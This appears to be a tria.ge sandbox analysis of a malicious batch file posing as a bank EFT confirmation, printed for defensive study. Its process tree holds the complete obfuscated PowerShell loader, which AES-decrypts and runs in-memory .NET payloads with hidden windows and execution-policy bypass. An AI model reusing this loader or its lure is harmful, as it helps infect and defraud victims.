Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01/03/2025, 00:35
Static task
static1
Behavioral task
behavioral1
Sample
Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
-
Size
62KB
-
MD5
4e49fd9891d84a4dff53559ce3fb1e4c
-
SHA1
6b44eb8513213887a7cf7a21a2ef75472fb32bcf
-
SHA256
6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
-
SHA512
feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626
-
SSDEEP
1536:5ImZkbmEKUgXEXzICKUnFCtb4+tD3Ezpaljp228c+:5I3Hfctb4UD3EzpVBc+
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2792 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2716 2244 cmd.exe 31 PID 2244 wrote to memory of 2716 2244 cmd.exe 31 PID 2244 wrote to memory of 2716 2244 cmd.exe 31 PID 2716 wrote to memory of 2792 2716 cmd.exe 33 PID 2716 wrote to memory of 2792 2716 cmd.exe 33 PID 2716 wrote to memory of 2792 2716 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZ2tveXQgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGdrb3l0KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRna295dCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRna295dCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZ2tveXQiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZGl1bnooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2xMYlE3dHpsWjVlRE4wNlpIQzVkTVJpYXFLcnc0dTU5bGhoTTh2cDlZRGc9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0hpY09vTElUU3hiVDB6aUlXK2JOUWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHV4bW4oJHBhcmFtX3Zhcil7CSR0c3ZicT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkcXB5bHY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkcWt0d3Q9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkdHN2YnEsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHFrdHd0LkNvcHlUbygkcXB5bHYpOwkkcWt0d3QuRGlzcG9zZSgpOwkkdHN2YnEuRGlzcG9zZSgpOwkkcXB5bHYuRGlzcG9zZSgpOwkkcXB5bHYuVG9BcnJheSgpO31mdW5jdGlvbiB1b2dlZSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHZycG9sPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGRrcnluPSR2cnBvbC5FbnRyeVBvaW50OwkkZGtyeW4uSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGdrb3l0OyR6b2J2aD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGdrb3l0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbnZmIGluICR6b2J2aCkgewlpZiAoJG52Zi5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHducXNhPSRudmYuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGl4bXd2PVtzdHJpbmdbXV0kd25xc2EuU3BsaXQoJ1wnKTskdXl4ZHE9aHV4bW4gKGRpdW56IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGl4bXd2WzBdKSkpOyR4eGp4aD1odXhtbiAoZGl1bnogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaXhtd3ZbMV0pKSk7dW9nZWUgJHV5eGRxICRudWxsO3VvZ2VlICR4eGp4aCAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-